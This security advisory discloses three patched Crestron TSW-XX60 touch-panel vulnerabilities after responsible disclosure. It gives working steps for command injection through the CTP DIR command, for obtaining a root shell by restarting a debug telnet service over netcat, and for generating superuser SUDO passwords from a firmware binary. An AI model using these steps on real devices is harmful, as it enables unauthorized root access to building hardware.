Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.

Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.

The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.

Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018–11229

Vulnerability Details

A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface open on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices. This interface does not list commands that could be used to directly access the underlying Android OS.

The CTP DIR command was vulnerable to command injection using a crafted command line payload with shell metacharacters. Output from the commands injected could be redirected into a text file on the device and read by adversaries.

Technical Description

The syntax of the DIR command allows a path to be specified:

DIR User/schedulingpanel

In the back end, the command being executed in the Android system follows:

ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"

An adversary could modify the query to execute a command, such as the following:

ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"

The built-in TYPE command could then be used to read the standard output of the whoami command:

TYPE output.txt root

The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands (e.g. SCREENSHOT ).

Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018–11228

Vulnerability Details

The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.

Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:

1. A system service, called telnetd_debug , was capable of binding to a Bash shell on port 23 (this service is disabled by default).

2. An undocumented administrative command ( RESTARTSERVICE ) could be used to start services.

These conditions could be leveraged by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnet_debug service with the RESTARTSERVICE command. When this chain of tasks was performed, an interactive shell could be obtained with the ability to run arbitrary system commands on the device. If the user does not have administrative privileges to use a terminal command, they could leverage the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).

Technical Description

The Crestron Toolbox Protocol can be connected to by accessing port 41795 on the TSW-XX60 device. The user would be met with a command line interface.

user@host:~$ nc -C 10.60.129.115 41795 TSW-760 Control Console

TSW-760> TELNETPORT Telnet Port: On

The user could then disable the running Telnet service and start the telnetd_debug service.

TSW-760> TELNETPORT OFF Telnet Port: Off

TSW-760> RESTARTSERVICE telnetd_debug Service telnetd_debug restarted

The telnetd_debug service could then be connected to by accessing port 23. In response, the user received an interactive Bash shell with which commands could be run on the target device as the current running user (i.e. root ).

user@host:~$ nc -C 10.60.129.115 23 bash-3.2# whoami root

bash-3.2# pwd /

bash-3.2# uname -a Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux

Elevation of Privilege in Crestron Terminal Protocol

Identifier: CVE-2018–13341

Vulnerability Details

Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited through access to administrative credentials in the device firmware. If an adversary gained access to system binaries (e.g. by obtaining the firmware), they could leverage the “ supwdgenerator ” binary to generate administrative passwords for the built-in SUDO command.

This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.

Technical Description

The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.

TSW-760> HELP ALL ... GETANALOGJOIN Programmer Get a analog join value GETAUDITLOG Administrator Retrieve the audit log. GETDIGITALJOIN Programmer Get a digital join value GETPAsswordrule Administrator Display password rules GETSERIALJOIN Programmer Get a serial join value ... PING Operator Ping remote node POEPLUS Programmer Enable/disable 24V PRINTAUDITLOG Administrator Print the audit log. PROJECTREFresh Administrator Sets time to Refresh project. PROJECTRESTART Programmer Restart the user project. ...

One of the commands ( SUDO ) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.

TSW-760> SUDO SUDO cmd [param1 param2 ...] cmd: command to execute. param1,param2,…: parameters for the command.

TSW-760> SUDO DIR Username: idontknow Password: ********* Invalid user name or password..

Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.

An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:

user@host:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8

The adversary could then use the password to authenticate with the SUDO command, as shown below:

TSW-760> SUDO DIR Username: crengsuperuser Password: ****************

Directory of [DIR] 02–07–18 11:27:41 ROMDISK [DIR] 09–29–17 18:07:06 SSHBanner [DIR] 02–07–18 11:21:16 SYS ...

Disclosure Process

Following Security Compass’s responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.

A response was promptly received from Crestron that they were investigating the matter with their engineering team.

Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.

A general release patch was available on May 30, 2018.

To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.

Author: Steven Patterson, Consultant at Security Compass

Special thank you to Jackson Thuraisamy.